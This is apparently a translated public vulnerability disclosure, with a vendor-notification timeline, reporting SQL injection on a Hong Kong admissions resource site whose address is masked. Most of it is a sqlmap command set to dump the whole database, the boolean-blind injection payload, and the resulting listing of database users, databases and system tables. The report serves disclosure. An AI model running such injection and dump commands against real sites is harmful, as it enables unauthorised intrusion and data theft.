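2015-10-28: Details reported to the vendor; awaiting vendor response
2015-10-30: Vendor confirmed; details disclosed to the vendor only
2015-11-09: Details disclosed to core white hats and experts in related fields
2015-11-19: Details disclosed to regular white hats
2015-11-29: Details disclosed to intern white hats
2015-12-14: Details disclosed to the public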
SQL injection at one point in the Hong Kong site 香島內地升學資源網 (a resource site for mainland university admissions)
Test URL: http://**.**.**.**/pagelisting.php?id=P00070
python sqlmap.py -u "http://**.**.**.**/pagelisting.php?id=P00070" --batch --technique=BEU --threads=10 -D pg_catalog -T pg_db_role_setting --dump-all
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=P00070' AND 4422=4422 AND 'bjqj'='bjqj
---
web application technology: Apache 2.2.11, PHP 5.2.8
back-end DBMS: PostgreSQL
current user: 'userweb'
current user is DBA: False

database management system users [2]:
[*] pgman
[*] userweb

available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public

Database: pg_catalog
[51 tables]
+-------------------------+
| pdZammj                 |
| pg_aggregate            |
| pg_am                   |
| pg_amproc               |
| pg_attrdef              |
| pg_attribute            |
| pg_auth_members         |
| pg_authid               |
| pg_cast                 |
| pg_class                |
| pg_collation            |
| pg_constraint           |
| pg_conversion           |
| pg_database             |
| pg_db_role_setting      |
| pg_default_acl          |
| pg_depend               |
| pg_description          |
| pg_enum                 |
| pg_event_trigger        |
| pg_extension            |
| pg_foreign_data_wrapper |
| pg_foreign_server       |
| pg_foreign_table        |
| pg_index                |
| pg_inherits             |
| pg_language             |
| pg_largeobject          |
| pg_largeobject_metadata |
| pg_namespace            |
| pg_opclass              |
| pg_operator             |
| pg_opfamily             |
| pg_pltemplate           |
| pg_proc                 |
| pg_range                |
| pg_rewrite              |
| pg_seclabel             |
| pg_shdepend             |
| pg_shdescription        |
| pg_shseclabel           |
| pg_statistic            |
| pg_tablespace           |
| pg_trigger              |
| pg_ts_config            |
| pg_ts_config_map        |
| pg_ts_dict              |
| pg_ts_parser            |
| pg_ts_template          |
| pg_type                 |
| pg_user_mapping         |
+-------------------------+

Database: pg_catalog
Table: pg_auth_members
[4 columns]
+--------------+------+
| Column       | Type |
+--------------+------+
| admin_option | bool |
| grantor      | oid  |
| member       | oid  |
| roleid       | oid  |
+--------------+------+

Database: pg_catalog
Table: pg_user_mapping
[3 columns]
+-----------+-------+
| Column    | Type  |
+-----------+-------+
| umoptions | _text |
| umserver  | oid   |
| umuser    | oid   |
+-----------+-------+

Database: pg_catalog
Table: pg_db_role_setting
[3 columns]
+-------------+-------+
| Column      | Type  |
+-------------+-------+
| setconfig   | _text |
| setdatabase | oid   |
| setrole     | oid   |
+-------------+-------+
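Add input filtering.
Severity: High
Vulnerability Rank: 12
Confirmed at: 2015-10-30 19:05
The relevant organization has been notified of the incident.
None at this time.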